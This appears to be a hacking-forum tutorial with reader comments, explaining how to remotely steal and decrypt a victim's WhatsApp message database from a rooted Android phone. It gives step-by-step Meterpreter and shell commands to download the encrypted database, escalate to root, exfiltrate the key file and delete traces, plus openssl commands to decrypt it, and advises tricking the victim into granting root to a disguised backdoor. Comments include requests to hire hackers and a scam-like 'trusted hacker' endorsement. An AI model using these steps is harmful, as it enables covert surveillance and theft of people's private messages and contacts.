How To: Hack and Decrypt WhatsApp Database (Remotely) [ROOT]

Hack and Decrypt WhatsApp Database (Remotely) [ROOT]

Hello my fellow hackers, it's been a while since my last post, I can't get the time now-a-days for the posts but can manage to tend to comments.

Welcome to my 9th post, this tutorial will explain how to extract and decrypt WhatsApp database from the Victim's android system.

Yes the device should be rooted, there is no way around to do this remotely. I have been getting PM's about this and can't simply answer with the word SPOOF.

WhatsApp?

Almost everyone knows about it. It is a social android application, that's enables the user to send free messages through the internet within seconds. The developers have made huge success and have high level and complex algorithms to encrypt and store the data, which changes with every update! And hence everyone uses it to send even the most personnel messages because they know it's safe.

But is it ?

Yes is it actually very safe, however if the Victim is a fool or gullible, he/she is the main vulnerability here. I see many of the 'experienced users' root their android to explore/push to the system's maximum limits. Following their footsteps the 'inexperienced users' also root/brick their android just to accomplish a minor task. They don't even care about the Cons.

Anyway, lets execute the hack:

Step 1: Exploit and Gain Access to the Android!

This the easy part which you all like and are used-to.

Follow this guide to gain access to the Rooted android.

Once at meterpreter prompt, type check_root to make sure the device is rooted.

What Do We Require?

To decrypt the database, we need the database itself obviously and a key file in the /data folder, for which we need root to access the location. We cannot decrypt the database without the key (Until you want to spend more than 100 of years even with a mainframe!)

Step 2: Let's Begin the Extraction Process for Database:

In meterpreter type:

  • cd /
  • cd /sdcard/WhatsApp
  • ls (Print the current directory)
  • cd Databases
  • download msgstore.db.crypt8 (This will take time, maybe a LOT)

So, the database has been downloaded, now we need to 'Key of Decryption'
(Key file that holds the encryption keys cannot be retrieved any-more unless your phone is rooted)

Step 3: Drop into the Shell:

As told before, but adding a little more detail here:

To decrypt the crypt8 files, we will need the key file. The key file stores two sets of decryption keys – the actual encryption key,K and an initialisation vector called IV . WhatsApp stores the key file in a secure location.

Extracting the key file, type:

  • shell
  • su (For Super User access or simply escalating privileges)

Here comes the tricky part, if the target is experienced and skilled, he must have installed the SuperSU application.

The application is responsible for holding the permissions whether which application can have access to root. It even holds all the logs.

So, we need to convince the Victim that the application is for boosting (or any other reason) his/her android system but at the same time requires root access to reach it's maximum potential. Here is an excellent tutorial by bart that shows how to disguise a back-door application.

(---------------"Victim, opens SuperSU and gives the permission"---------------)

There are some cases with inexperienced and unskilled users:

  • They don't have a SuperSU application installed.
  • They have not changed the setting for newly installed apps to PROMPT instead of GRANT.

So in these cases we are really lucky!

Lets' continue:
(If the android is not rooted you can navigate, but not copy or print the directory)

  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key /sdcard/Download

(Means copy the file 'key' to sdcard>Download folder)

Terminate the shell:
^C (Control+C)

The key has been extracted from /data to /sdcard successfully!

Step 4: Again to Meterpreter:

Lets download the extracted key file to our root directory as we did for the encrypted database, type:

  • cd /
  • cd /sdcard/Download
  • download key
  • rm key (Make sure you do that to delete the key file)

The Key has been extracted to our root directory successfully!

Step 5: DECRYPT THE DATABASE!

Now that we have the database and the key, we can easily decrypt it with one of the two methods:

#1 With Simple Linux Commands:

With the two necessities in the root directory, open a terminal and type:
(Copy and Paste the commands one at a time, don't make a a script out of it, or it will not work)

  • hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt
  • hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt
  • dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
  • gzip -cdq msgstore.gz > msgstore.db

If you even a little bash, then you can easily understand these commands. (Source: here)

If the 4th command does not work, follow:

  • hexdump -e '2/1 "%02x"' key | cut -b 253-316

(Copy the printed text)

  • hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134

(Copy the printed text)

  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (Paste text from 1st command) -iv (Paste text from 2nd command) > msgstore.gz

These commands have bugs/errors in the result, so I would highly recommend to go for the #2 method.

#2 With Simple Windows WhatsApp Viewer Application:

The application has an excellent interface, from GitHub . Download the application from there.

Also, copy the key and database to windows, I hope you know how to do that.

  • Open the application (in windows of course).
  • Click FIle, then on 'Decrypt .crypt8'
  • In the dialogue box that appears, provide the Key file and Database.
  • Click OK, you will see that a 'msgstore.decrypted' file has appeared at your desktop.
  • Open it using the same application, go to 'File' then 'Open'.
  • Provide the Decrypted file, leave the Account name blank and for the 'wa.db', you can hack the phone again to extract this .db, to resolve contact names as mentioned in the cropped screenshot below.
  • Click 'OK'

And 'Boom' all the contacts with all the chats even the latest ones awaits your Click

The Tutorial Ends:

Now that you know how dangerous Rooting actually is, please, beware.

A cracker can not only perform this simple hack, he can even extract all the Wi-Fi passwords stored in your android, he can access everything, things that even you don't have access to!! He may spread to your PC once you connect your android, hack your accounts (saved passwords) and even frame you. You just become a mere pawn to his further plans.

So, think twice before rooting and be really careful, while holding a rooted android in your hands.

Thank You!
F.3.A.R.

29 Comments

Good to see you're back!

-Phoenix750

Hi...I am new in Kali linux..
I dont speak english..
sorry..
but..
In my kali linux when " shell..cd /data/data......ls...operation failed acess denied...
help..plz..
I have the install Supersu???
I dont understand..please help me..

Hi...I am new in Kali linux..
I dont speak english..
sorry..
but..
In my kali linux when " shell..cd /data/data......ls...operation failed acess denied...
help..plz..
I have the install Supersu???
I dont understand..please help me..

Could you please specify a bit more??? it could be because you haven't created the tcp listener.

Yeah, me too!

Hi fear
Am new to hacking , pls can i be ur student for a little while to learn some stuff?

Hello

i have a lot of jobs to hack whatsapp can you get me privately

Excellent tutorial, I was looking into this a few weeks ago as well. (Also thanks for the kind words :) )

Thank You Bart,

I got stuck after decompiling the malicious apk (to change the name and icon), then your tutorial showed me another way about it.

So yes, it was truly amazing. :)

Awesome, FEAR!
I'm looking forward to more android hacking!

Thank You Cameron!
The pace of the development in android hacking is very slow, while androids are spreading faster than computers.
So, I will try to keep the spirits up.

just few days ago, I was wondering of what encryption those files were using. great article F.E.A.R

this means that the victim's phone should be rooted to extract the whatsapp database
?

Yes, that's what the tutorial explains all the time.

Are you saying I have to get physical access to their phone first?

No, if you follow this tutorial.

What type if you want to upload a picture of the victim

Using the upload command , but why would you want to do that, did you meant download?

yes i meant download

Simply use the download command, Eg:
download acb.png
download a/b/c/xyz.jpeg

Do I have to tell the victim to actually install the apk and tell him to open it when I hit exploit? It's kinda impossible for the victim not to suspect then...

I'm not a hacker, but I am concerned that someone may have hacked my watsapp. Is it possible that someone living thousands of miles away (has no access to my networks, wifi or phone) may be able to hack my watsapp in real time? Also, can a person intercept my skype calls or IMs even if they are not a contact of mine? Please enlighten me.

I'm getting an error while trying to download msgstore.db.crypt8

  • stdapifsstat: operation failed: 1
  • can anybody help me?

which phone is the targeted phone? I did not understand.

Can you contact me please? It is impossible to send you a private message.

Just an enquiry..

There's an easy way instead of decoding that file...I can download it, paste it on my phone, and create a new whatsapp with any phone number and use it as a backup so I can read them clearly. Am I right?

Contact titan_brown on Instagram for hacks and recovery. He is the only online hacker I trust, he has really helped me a lot. Try him out and drop your testimonies

Share Your Thoughts

  • Hot
  • Latest